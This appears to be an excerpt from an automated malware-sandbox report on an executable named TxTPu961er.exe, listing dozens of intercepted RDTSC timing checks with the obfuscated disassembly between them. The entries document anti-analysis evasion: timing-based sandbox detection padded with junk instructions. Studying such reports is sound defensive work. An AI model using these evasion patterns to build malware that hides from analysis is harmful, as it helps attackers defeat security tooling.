Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E179F second address: 6E17A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E17A5 second address: 6E17B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E17B0 second address: 6E17B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E17B7 second address: 6E17CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905006510h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E17CD second address: 6E17D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B3CBE second address: 6B3CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B225C second address: 6B2262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7BF1 second address: 6E7BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7BFC second address: 6E7C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7C02 second address: 6E7C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7C07 second address: 6E7C16 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jno 00007F7905119FB6h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7C16 second address: 6E7C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7905006506h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7DB8 second address: 6E7DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7DBE second address: 6E7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E7F43 second address: 6E7F6D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7905119FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7905119FBEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jmp 00007F7905119FBDh 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E80BB second address: 6E80C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6E84CA second address: 6E84D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB6E4 second address: 6EB6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB6E8 second address: 6EB6EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB7A3 second address: 6EB7A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB7A9 second address: 6EB7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FC2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB8F1 second address: 6EB8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB8F5 second address: 6EB906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB906 second address: 6EB90B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EB90B second address: 6EB928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7905119FC1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EC423 second address: 6EC428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EC428 second address: 6EC448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EC448 second address: 6EC44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ECA50 second address: 6ECA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ED4CE second address: 6ED4FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7905006515h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ED4FD second address: 6ED557 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F7905119FB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov di, cx 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F7905119FB8h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 mov edi, ecx 0x00000043 push 00000000h 0x00000045 or si, 201Eh 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 pop eax 0x00000051 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ED557 second address: 6ED55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ED55D second address: 6ED563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ED563 second address: 6ED567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6ED567 second address: 6ED58E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 js 00007F7905119FB6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EF232 second address: 6EF238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6EF238 second address: 6EF263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7905119FB6h 0x0000000a jns 00007F7905119FB6h 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007F7905119FC5h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F04AF second address: 6F054B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F7905006508h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 xor dword ptr [ebp+122D27A8h], esi 0x0000002a mov esi, dword ptr [ebp+122D281Bh] 0x00000030 push 00000000h 0x00000032 movzx edi, bx 0x00000035 jg 00007F790500650Ah 0x0000003b mov si, 326Ch 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F7905006508h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 0000001Dh 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b mov edi, 0BF55973h 0x00000060 xchg eax, ebx 0x00000061 jc 00007F790500650Eh 0x00000067 jne 00007F7905006508h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 jmp 00007F790500650Bh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F054B second address: 6F0550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F0281 second address: 6F0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F0550 second address: 6F0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F0286 second address: 6F0290 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F790500650Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F0D41 second address: 6F0D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F0D45 second address: 6F0D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F192D second address: 6F198A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F7905119FBCh 0x0000000b nop 0x0000000c mov esi, 1CF4560Fh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7905119FB8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 jmp 00007F7905119FC3h 0x00000035 jg 00007F7905119FB9h 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F198A second address: 6F1990 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F1990 second address: 6F1996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F1996 second address: 6F199A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F199A second address: 6F199E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F4A91 second address: 6F4AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905006512h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F4AA8 second address: 6F4AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jne 00007F7905119FB6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7905119FC0h 0x00000019 pushad 0x0000001a jp 00007F7905119FB6h 0x00000020 jmp 00007F7905119FBFh 0x00000025 jmp 00007F7905119FC3h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F35B9 second address: 6F35BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F4AF6 second address: 6F4AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F4AFC second address: 6F4B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F4B02 second address: 6F4B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F4B06 second address: 6F4B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B06F5 second address: 6B0724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7905119FC2h 0x00000012 jg 00007F7905119FB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B0724 second address: 6B0753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnc 00007F7905006506h 0x00000010 jmp 00007F7905006516h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B0753 second address: 6B075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B075B second address: 6B075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B075F second address: 6B0763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B0763 second address: 6B0777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7905006506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F7905006512h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B0777 second address: 6B077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F6D73 second address: 6F6DE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F7905006508h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 xor di, 6D45h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F7905006508h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 jmp 00007F7905006515h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F6DE2 second address: 6F6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FC2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F5E39 second address: 6F5E3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F7022 second address: 6F7026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F7026 second address: 6F702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F702C second address: 6F7058 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7905119FBCh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7905119FC3h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F7058 second address: 6F705D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F8001 second address: 6F800F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7905119FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F9EC1 second address: 6F9EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6F8FE9 second address: 6F8FF6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7905119FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6FAF8D second address: 6FAF92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6FB192 second address: 6FB1A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FC3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6FCE9F second address: 6FCEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6FC178 second address: 6FC17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6FC17D second address: 6FC183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6FFDC7 second address: 6FFDED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7905119FD0h 0x00000008 jmp 00007F7905119FC8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70140F second address: 701413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 701413 second address: 701458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, edi 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F7905119FB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F7905119FBAh 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+122D554Bh], edi 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 pop edi 0x0000003a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 702588 second address: 70259F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F7905006506h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F7905006508h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70259F second address: 7025AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F7905119FB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 70159E second address: 7015A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7015A2 second address: 7015BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7015BC second address: 7015C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7015C1 second address: 7015EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7905119FB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7905119FC8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7015EC second address: 7015F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7046F9 second address: 7046FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
